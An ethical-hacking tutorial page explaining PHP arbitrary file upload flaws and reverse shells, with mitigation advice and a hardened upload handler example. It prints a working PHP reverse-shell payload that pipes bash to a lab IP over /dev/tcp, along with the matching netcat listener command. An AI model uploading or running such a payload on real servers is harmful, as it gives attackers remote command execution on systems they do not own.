
PHP
  • ethical-hacking
  • reverse-shell
  • arbitrary upload
  • remote execution
  • web exploitation

Reverse Shells and Arbitrary Uploads


Exploring PHP vulnerabilities and how they turn into remote access. This exercise introduces us to one of the most basic —and powerful— techniques in the hacking world: the reverse shell. A simple vulnerable form, a malicious file uploaded without restrictions, and suddenly, the server is talking to you.

PHP: The Server-Side Language

PHP (Hypertext Preprocessor) is an interpreted server-side programming language. Originally designed for web development, and despite criticism, it still powers much of the internet infrastructure.

It executes instructions directly on the server, which means that any uploaded and executed .php file runs with the privileges of the web server process and can reach the file system, run system commands, and more —if not properly controlled.

Common Vulnerabilities in PHP

PHP has been a source of vulnerabilities for years, mainly due to bad practices in:

  • Unrestricted file uploads.
  • File inclusion (include, require) without path validation.
  • Use of dangerous functions like exec(), system(), eval().
  • Processing user variables without sanitization ($_GET, $_POST, etc.).

One of the most common —and deadly— is arbitrary file upload.

What is Arbitrary File Upload?

It means that an application allows you to upload any type of file, without checking extensions, content, permissions, or location.

In PHP environments, this can allow an attacker to upload a malicious .php file. When that file is accessed from the browser, the server executes it as code. As a result, the attacker can execute commands, download tools, or establish a reverse shell.

What is a Reverse Shell?

A reverse shell is an outgoing connection from the victim machine to the attacker's machine. Instead of the attacker connecting directly to the server (which may be blocked by firewalls), the compromised machine connects out, opening a remote shell.

Why is it used?

  • Evades firewalls that block incoming connections.
  • Allows maintaining active sessions from internal networks.
  • Is a starting point for lateral movement or persistence.

What can a Reverse Shell do?

Once established, the attacker can:

  • Browse the file system.
  • Read and modify files.
  • Scan the internal network.
  • Download additional tools.
  • Execute commands as the current user.
  • Look for privilege escalation vectors.

All from a simple text connection.

How a Reverse Shell Works in PHP

A basic payload in PHP might look like this:

    <?php
    exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.1/4444 0>&1'");
    ?>

This tells the server: open a TCP connection to 192.168.56.1 on port 4444, and redirect the interactive bash's standard input, output and error to that socket. Meanwhile, on the attacker's machine, you wait for the connection with:

    nc -lvnp 4444

When the uploaded PHP file is requested through the browser, the server executes the code and the reverse shell connects back to the waiting listener.

⚠️ Risks of Not Validating Uploads

The absence of validation in upload forms can:

  • Allow remote code execution.
  • Provide access to persistent shells.
  • Facilitate malware or ransomware deployment.
  • Endanger the entire network.

Best practices:

  • Limit file types.
  • Rename and move uploaded files.
  • Validate both on client and server side.
  • Never allow execution in upload folders (/uploads/ should be separated from the PHP backend).
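A server-side handler that applies these practices, written as an added example for this lesson (it is not code from the page). The form field name "document", the storage path /var/app/uploads and the allow-list of types are assumptions.

```php
<?php
// Added example: hardened upload handler. Assumptions: the form field is
// named "document", files go to /var/app/uploads (outside the web root, so
// the web server never serves or executes them) and only the types below are wanted.
declare(strict_types=1);

const UPLOAD_DIR = '/var/app/uploads';
const MAX_BYTES  = 2 * 1024 * 1024;
// Allow-list: extension => MIME type that must be detected from the file's bytes.
const ALLOWED = ['png' => 'image/png', 'jpg' => 'image/jpeg', 'pdf' => 'application/pdf'];

function storeUpload(array $file): string
{
    // Only handle a file PHP itself received in this POST request.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('no valid uploaded file');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Judge the LAST extension, lower-cased: "shell.png.php" is rejected here,
    // and "shell.php.png" must still pass the content check below.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        throw new RuntimeException('extension not allowed');
    }
    // Detect the type from the bytes on disk, never from the client-sent $file['type'].
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException("content type $mime does not match .$ext");
    }
    // Drop the client's file name; store under a random name with the vetted extension.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640);   // no execute bit, even if the directory were ever web-served
    return $name;         // the opaque name is the only thing the client learns
}

try {
    echo 'stored as ', htmlspecialchars(storeUpload($_FILES['document'] ?? []), ENT_QUOTES, 'UTF-8');
} catch (RuntimeException $e) {
    http_response_code(400);
    echo 'rejected: ', htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
}
```

Files are later served back only through a script that reads UPLOAD_DIR by the stored name, never by a direct URL. If an upload directory must be web-accessible at all, also switch the PHP handler off for it at the web server (for Apache's mod_php, `php_admin_flag engine off` in that directory's configuration).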

Quick Diagnosis: Exposure Checklist

A reverse shell is the system's whisper, telling you: "You're no longer outside." A simple, poorly protected upload function is enough to turn a server into an open door, and you, as an attacker, just need to know where to look.